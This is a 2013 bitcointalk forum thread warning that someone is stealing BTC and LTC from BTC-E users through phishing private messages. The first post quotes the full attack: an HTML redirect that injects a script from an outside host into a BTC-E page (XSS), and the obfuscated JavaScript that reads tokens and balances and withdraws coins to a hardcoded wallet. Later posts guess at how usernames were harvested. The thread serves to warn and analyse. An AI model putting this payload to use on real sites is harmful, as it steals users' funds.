|
Title: Attention - Someone is stealing BTC & LTC at BTC-E Post by: nsieugesug on April 21, 2013, 06:35:36 PM Hello,
today I got a private message at BTC-E. This is the first strange thing since I didn't ever use the trollbox or used the PM system there. It contains a link to hxxp://fast-image.(dontclickthisshit)com/guh8ydyxz/bitcoin_chart15493.jpg, which is not an image, but an HTML file. Quote <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> </head> <body> <script language="JavaScript"> document.location="https://btc-e.com/news/32?page=1<script+src=http://fast-image.com/q.js><\/script>"; </script> </body> </html> This downloads a script which seems to exploit an XSS vulnerability on BTC-E. Quote eval((function(x){var d="";var p=0;while(p<x.length){if(x.charAt(p)!="`")d+=x.charAt(p++);else{var l=x.charCodeAt(p+3)-28;if(l>4)d+=d.substr(d.length-x.charCodeAt(p+1)*96-x.charCodeAt(p+2)+3104-l,l);else d+="`";p+=4}}return d})("var wallet_btc = \"1DnwcSevrYyUCTxbPmL1TtABoaucDTMTYo\";` K'l` P\"LSQBL4Rs1rjP3tZUVb4MfXSQu1JEyWr7ix` P\"redir = \"http://fast-image.com/guh8ydjxz/bitcoin_chart15483.jpg` _\"xmlhttp = false` /!btc_amount` *!lt` \")token` %!sec;try {` [&new XMLHttpRequest;} catch (e) {` </ActiveXObject(\"Msxml2.XMLHTTP\")` /Microsoft` K4document.location =`#E\";}}}func` /!postData(page, data, step`!=$if (`!B#)`!J%.open(\"POST\", ` U\"true);if (step == 1` E(nreadystatechange = handler1;} else ` Q(2` 6C2` I03` 6C3` I04` 6C4` I05` 6C5` U$`$,8` a$set`&?#Header(\"Content-type\", \"appli` Y\"/x-www-form-urlencoded\");` T6X-` *#ed-With\", \"`'P*` R)nd(data)`!_@`&JE`&i%`%M$(evtXHR)`&V).`#M!State`$C$` 2(status`%z!00) {return`!}#1(`!LB`!:-2` Zm2` sT3` g``*K%\"../ajax/profile.php\", \"task=funds\", 4`!4S4`\"Em4`\"^T5`!#D`&\\A`&%, {`1`\"sponse =`1$$.` +$Tex`0m\"div = ` |%createElement(\"div\");div.innerHTML`!:!` _\"` 4!style.display = \"none\";` i%body.appendChild(div);`2%!`!-(get`!/#ById(\"` <!\").value`/>!` -!.length`.,!2) {`3&& = Math.floor(parseFloat(` p/sByClassName(\"money_btc\")[0]`\"@&)`0U\"` x'> 5`%>!`!))500;}`&zBedit%2Fhome\", 2`%UB`$o22`$#~`$D]sec`$g8s_email\"`#a\"!sec.checked`*\\1coins`#G$act=withdraw&sum=\" + `$,'+ \"&address` 6!wallet_btc` 6!coin_id=1&`&1!` >!` %!, 3`#ZX4`#jHl`!f%_rgx`#h'.match(/Balance: \\<b class='red'\\>([0-9]+.?` #!*)\\<\\/b\\> LTC/);` o& =` w+.slice(1` 6+`(D2` 9&`($#` I'> 300`((!` \\)` 0!;}`$*c` p'`$Z3l`$b+8`$_.5`$KB`!N.billing`!N0_coin%2F1\", 1);")) According to Blockexplorer, significant amounts of BTC were already stolen: http://blockexplorer.com/address/1DnwcSevrYyUCTxbPmL1TtABoaucDTMTYo Title: Re: Attention - Someone is stealing BTC & LTC at BTC-E Post by: nsieugesug on April 21, 2013, 06:41:57 PM (could an admin/moderator move this to the proper section please?)
Title: Re: Attention - Someone is stealing BTC & LTC at BTC-E Post by: maurits150 on April 21, 2013, 06:42:35 PM I'm also interested how they managed to send a PM to my username when I haven't written a message in the trollbox for over a week (banned). This attack was clearly planned out well because they have been harvesting usernames for a long time.
Title: Re: Attention - Someone is stealing BTC & LTC at BTC-E Post by: dudeofthestick on April 21, 2013, 06:46:36 PM What operating system and browser version are you using? With versions, please.
Title: Re: Attention - Someone is stealing BTC & LTC at BTC-E Post by: Becher-Karl on April 21, 2013, 06:52:09 PM In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned).
@nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all? If not, it would be really interesting to know how they could send you a PM. Title: Re: Attention - Someone is stealing BTC & LTC at BTC-E Post by: nsieugesug on April 21, 2013, 06:52:58 PM What operating system and browser version are you using? With versions, please. Browser? I prefer to use wget on a seperate Linux box when someone wants me to click strange links... ;D Title: Re: Attention - Someone is stealing BTC & LTC at BTC-E Post by: nsieugesug on April 21, 2013, 06:54:34 PM In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned). @nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all? If not, it would be really interesting to know how they could send you a PM. Trollbox is enabled in my account, but I never posted something there. However, I'm not 100% sure. Could have typed some bullshit there by accident. Title: Re: Attention - Someone is stealing BTC & LTC at BTC-E Post by: optimator on April 21, 2013, 06:58:50 PM In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned). @nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all? If not, it would be really interesting to know how they could send you a PM. harvest all usernames from bitcointalk and reddit.com/r/bitcoin and blast away? That's my guess Title: Re: Attention - Someone is stealing BTC & LTC at BTC-E Post by: nsieugesug on April 21, 2013, 07:10:45 PM Looks like they have removed the attack scripts from the server. No problem, you have a copy here now. ;D
Title: Re: Attention - Someone is stealing BTC & LTC at BTC-E Post by: bzh on April 21, 2013, 07:15:10 PM In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned). @nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all? If not, it would be really interesting to know how they could send you a PM. harvest all usernames from bitcointalk and reddit.com/r/bitcoin and blast away? That's my guess I never posted on reddit or bitcointalk with my username on btc-e. Or any bitcoin site for that matter. I Still somehow got the PM as well. I'm more inclined to think that the user info was hacked on BTC-E. Title: Re: Attention - Someone is stealing BTC & LTC at BTC-E Post by: samten on April 21, 2013, 07:30:40 PM don't trust strangers
Title: Re: Attention - Someone is stealing BTC & LTC at BTC-E Post by: optimator on April 21, 2013, 07:38:05 PM I never posted on reddit or bitcointalk with my username on btc-e. Or any bitcoin site for that matter. I Still somehow got the PM as well. I'm more inclined to think that the user info was hacked on BTC-E. Bummer! That does lead one to the conclusion that there was inside help.... Title: Re: Attention - Someone is stealing BTC & LTC at BTC-E Post by: moni3z on April 21, 2013, 07:49:20 PM You get a list of usernames simply by typing in https://btc-e.com/profile/1 through whatever.
Write a script that goes through all those numbers and have it send PMs. https://btc-e.com/profile/1000 https://btc-e.com/profile/10000 https://btc-e.com/profile/80001 Title: Re: Attention - Someone is stealing BTC & LTC at BTC-E Post by: nsieugesug on April 21, 2013, 08:10:25 PM You get a list of usernames simply by typing in https://btc-e.com/profile/1 through whatever. Write a script that goes through all those numbers and have it send PMs. You're right, that would explain why I got the message. It even shows the time of the last activity, so the attacker can specifically target active accounts. Title: Re: Attention - Someone is stealing BTC & LTC at BTC-E Post by: nsieugesug on April 21, 2013, 08:40:09 PM Would anyone with full posting rights like to crosspost this to https://bitcointalk.org/index.php?board=85.0 (Service Discussion)?
I think this deserves more attention, but the incredibly stupid newbie restriction policy of this forum doesn't allow me to post this thread where it belongs. >:( |